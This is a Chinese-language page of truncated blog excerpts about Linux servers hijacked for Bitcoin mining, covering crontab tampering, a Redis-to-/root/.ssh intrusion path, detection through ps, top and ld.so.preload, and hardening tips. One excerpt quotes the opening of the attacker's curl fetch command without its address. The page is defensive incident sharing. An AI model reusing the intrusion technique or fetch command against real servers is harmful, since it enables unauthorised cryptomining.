crontab,比如 redis 可以把缓存内容写入本地文件的漏洞,他就可以随便在服务器的 /root/.s ...
最近公司的一个服务器cpu占用比较高,定时任务出现问题,后来发现竟然给入侵了,用来跑比特币挖矿,特意分享下挖矿脚本 平时写点脚本定时任务备份数据库,最近登上服务器,才发现crontab被串改了。我写的定时脚本给删了。。。 就奇怪了,无端端多了几个计划任务 开始还以为公司那位干的定时任务,我就研究下干什么,查了一下发现是印度IP,发现服务器入侵了 curl fsSL http: . . . : i. ...
2017-11-13 11:01 0 1942 推荐指数:
crontab,比如 redis 可以把缓存内容写入本地文件的漏洞,他就可以随便在服务器的 /root/.s ...
一般情况下,挖矿病毒都是自动扫描+自动挂马生成的,并不会是有专人进行攻击,所以也比较好清除,注意清除之后需要 check 有无后门。 最重要几点(也可能是被hack的原因):禁止 ROOT 用户登陆,ROOT 不能使用弱密码,FRP 需要配置,不能使用默认选项。 挖矿进程占用的 CPU 资源 ...
最近翻译了中本聪先生发明比特币的论文,在这篇论文中他说比特币的产生由挖矿者计算最优散列值计算得到,第一个计算得到这一散列值的也就是block的第一人将会获得比特币。别的人无功而返。看了一些其他的参考资料也是这样。但是我自己挖矿了好像不是这样,经过一段时间的挖矿过程后我产生了微量的比特币 ...
第一步:下载比特币挖矿软件 下载地址:http://www.guiminer.org/ 第二步:到矿池注册帐号,推荐矿池:火币矿池 注册地址:https://www.huobi.com 配置文档 ...
注册一个矿池账号,推荐https://www.f2pool.com/通过ssh连接远程服务器创建一个路径用来保存挖矿工具使用weget命令下载挖矿工具输入命令,账号密码以参数形式传入,开始挖矿wget http://downloads.sourceforge.net/project ...
1、找出耗cpu最大的几个进程以及其启动脚本命令(post为用户) # ps aux|head -1;ps aux|grep -v PID|sort -rn -k +3|head | grep post 2、找出的挖矿脚本命令如下: #./sh -u ...
查看哪个进程占据cup 通过 top 或者使用 ps aux 我这个通过top 命令看不到哪个进程占用了cup ,执行 cat /etc/ld.so.preload 查看,里面也加载了异常的 ...
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article ...